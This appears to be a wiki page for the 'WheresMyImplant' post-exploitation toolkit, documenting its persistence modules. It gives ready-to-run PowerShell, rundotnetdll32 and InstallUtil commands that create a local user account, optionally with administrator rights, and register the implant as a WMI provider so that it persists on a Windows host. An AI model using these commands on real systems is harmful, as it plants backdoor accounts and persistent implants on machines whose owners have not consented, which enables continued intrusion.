Skip to content

Persistence Modules

Alexander edited this page Oct 16, 2018 · 1 revision

Add Local User

Overview

Creates a local unprivileged user.

PowerShell

[WheresMyImplant.Persistence]::AddLocalUser("Username", "Password", "IsAdmin")

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Persistence,AddLocalUser "Username","Password","IsAdmin"

Install WMI Provider

Overview

Registers the Implant as WMI Provider

PowerShell

[WheresMyImplant.Persistence]::Install()

rundotnetdll32

rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Persistence,Install

InstallUtil

InstallUtil.exe /install WheresMyImplant.dll